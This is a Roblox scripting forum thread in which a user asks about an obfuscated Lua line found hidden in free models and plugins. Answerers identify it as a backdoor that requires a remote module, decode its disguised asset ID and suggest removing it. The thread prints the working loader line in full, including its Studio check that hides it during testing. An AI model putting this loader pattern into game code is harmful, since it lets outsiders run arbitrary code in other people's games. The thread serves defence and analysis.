Scripting Helpers is winding down operations and is now read-only. More info→
Ad
Log in to vote
1

Any idea on this weird script?

Asked by 5 years ago
Edited 5 years ago

Any idea on what this script means, and if it is dangerous or not?

    spawn(function()game:WaitForChild('ServerScriptService')if game:GetService('Workspace').Terrain:FindFirstChild('CallF')then return end;if game:GetService('RunService'):IsStudio()then return end;require(math.sqrt(6.7743462758588e+18)).load(game.PlaceId)end)
0
I keep seeing it around... CaptainD_veloper 290 — 5y
0
I dont even understand what its trying to do .-. RoButCantBlox 68 — 5y
0
Its in different models. I dont even know what it means. People keep trying to hide it. CaptainD_veloper 290 — 5y
0
Its bad, check through your plugins and delete anything you cant verify is from a trusted source. Thats where its coming from, that or a free model. DinozCreates 1070 — 5y
View all comments (5 more)
0
it is probably trying to require this: https://www.roblox.com/library/2602757437/Content-Deleted but it seems to have been taken down GoldAngelInDisguise 297 — 5y
0
Yeah, but what does it do? CaptainD_veloper 290 — 5y
0
who knows? we dont even know the code for it GoldAngelInDisguise 297 — 5y
0
This is all the code. CaptainD_veloper 290 — 5y
0
he's saying that we dont know whats in the module that its requiring. Gey4Jesus69 2705 — 5y

2 answers

Log in to vote
0
Answered by 5 years ago

Yeah, that's a backdoor. It lets exploiters execute bad code into your games. I've had it before and it was in a plugin, so do Ctrl+Shift+F and paste the code in so that you can delete it from all the scripts that have it.

Ad
Log in to vote
0
Answered by 4 years ago
Edited 4 years ago

that is a backdoor 150% the "require" requires a module script (if im not incorrect)

(math.sqrt(6.7743462758588e+18)) i ran it and it came back with this: 2602757437

the reason i think it errored is that asset is " [ Content Deleted ] " you can view the original thing

HERE

Also the owner of it has been banned so it should stop all backdoors he added

I recommend THIS plugin to attempt to find backdoors / finds any scripts that have the word "require" and either A prints the script or B deletes the script Heres some pictures

1

2

GIF

Answer this question